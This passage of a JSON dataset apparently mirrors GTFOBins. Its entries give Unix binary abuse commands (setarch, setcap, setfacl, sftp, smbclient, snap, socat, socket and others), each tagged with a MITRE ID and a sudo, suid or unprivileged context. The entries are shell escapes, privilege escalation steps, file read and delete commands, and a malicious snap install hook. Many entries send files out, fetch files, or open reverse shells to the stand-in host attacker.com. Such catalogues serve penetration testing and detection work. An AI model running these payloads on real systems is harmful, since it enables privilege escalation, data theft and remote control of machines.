../../bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/service/"]},{"id":"gtfo:setarch:shell:0:sudo","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setarch/"]},{"id":"gtfo:setarch:shell:0:suid","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setarch/"]},{"id":"gtfo:setarch:shell:0:unprivileged","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/setarch/"]},{"id":"gtfo:setcap:privilege-escalation:0:sudo","toolId":"gtfo:setcap","toolName":"setcap","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setcap cap_setuid+ep /path/to/command","description":"This can be used to assign capabilities to executable files.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setcap/"]},{"id":"gtfo:setcap:privilege-escalation:0:suid","toolId":"gtfo:setcap","toolName":"setcap","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setcap cap_setuid+ep /path/to/command","description":"This can be used to assign capabilities to executable files.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setcap/"]},{"id":"gtfo:setfacl:privilege-escalation:0:sudo","toolId":"gtfo:setfacl","toolName":"setfacl","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setfacl -m u:$(id -un):rwx /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setfacl/"]},{"id":"gtfo:setfacl:privilege-escalation:0:suid","toolId":"gtfo:setfacl","toolName":"setfacl","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setfacl -m u:$(id -un):rwx /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setfacl/"]},{"id":"gtfo:setlock:shell:0:sudo","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setlock - /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setlock/"]},{"id":"gtfo:setlock:shell:0:suid","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setlock - /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setlock/"]},{"id":"gtfo:setlock:shell:0:unprivileged","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"setlock - /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/setlock/"]},{"id":"gtfo:sftp:download:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:download:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:download:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:shell:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:shell:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:shell:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:upload:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:upload:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:upload:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sg:shell:0:sudo","toolId":"gtfo:sg","toolName":"sg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sg root","description":"Commands can be run if the current user's group is specified, therefore no additional permissions are needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sg/"]},{"id":"gtfo:sg:shell:0:unprivileged","toolId":"gtfo:sg","toolName":"sg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sg $(id -ng)","description":"Commands can be run if the current user's group is specified, therefore no additional permissions are needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sg/"]},{"id":"gtfo:shred:file-write:0:sudo","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shred/"]},{"id":"gtfo:shred:file-write:0:suid","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shred/"]},{"id":"gtfo:shred:file-write:0:unprivileged","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shred/"]},{"id":"gtfo:shuf:file-read:0:sudo","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-read:0:suid","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-read:0:unprivileged","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-write:0:sudo","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-write:0:suid","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-write:0:unprivileged","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:slsh:shell:0:sudo","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/slsh/"]},{"id":"gtfo:slsh:shell:0:suid","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/slsh/"]},{"id":"gtfo:slsh:shell:0:unprivileged","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/slsh/"]},{"id":"gtfo:smbclient:download:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"smbclient '\\\\attacker.com\\share' -c 'get /path/to/input-file /path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:download:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"smbclient '\\\\attacker.com\\share' -c 'get /path/to/input-file /path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:shell:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"smbclient '\\\\host\\share'\n!/bin/sh","description":"A valid SMB/CIFS server must be available.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:shell:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"smbclient '\\\\host\\share'\n!/bin/sh","description":"A valid SMB/CIFS server must be available.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:upload:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:upload:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:snap:command:0:sudo","toolId":"gtfo:snap","toolName":"snap","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"snap install xxxx_1.0_all.snap --dangerous --devmode","description":"Generate the Snap package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\nmkdir -p meta/hooks\necho -e '#!/bin/sh\\n/path/to/command; false' >meta/hooks/install\nchmod +x meta/hooks/install\nfpm -n xxxx -s dir -t snap -a all meta\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/snap/"]},{"id":"gtfo:socat:bind-shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:bind-shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:bind-shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:download:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:download:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:download:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-read:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-read:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-read:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-write:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-write:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-write:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:reverse-shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:reverse-shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:reverse-shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"socat - exec:/bin/sh,pty,ctty,raw,echo=0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"socat - 'exec:/bin/sh -p,pty,ctty,raw,echo=0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"socat - exec:/bin/sh,pty,ctty,raw,echo=0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:upload:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:upload:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:upload:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socket:bind-shell:0:sudo","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:bind-shell:0:suid","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:bind-shell:0:unprivileged","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:reverse-shell:0:sudo","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:reverse-shell:0:suid","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:reverse-shell:0:unprivileged","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:soelim:file-read:0:sudo","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/soelim/"]},{"id":"gtfo:soelim:file-read:0:suid","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/soelim/"]},{"id":"gtfo:soelim:file-read:0:unprivileged","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/soelim/"]},{"id":"gtfo:softlimit:shell:0:sudo","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"softlimit /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/softlimit/"]},{"id":"gtfo:softlimit:shell:0:suid","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"softlimit /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/softlimit/"]},{"id":"gtfo:softlimit:shell:0:unprivileged","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"softlimit /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/softlimit/"]},{"id":"gtfo:sort:file-read:0:sudo","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-read:0:suid","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sort -m 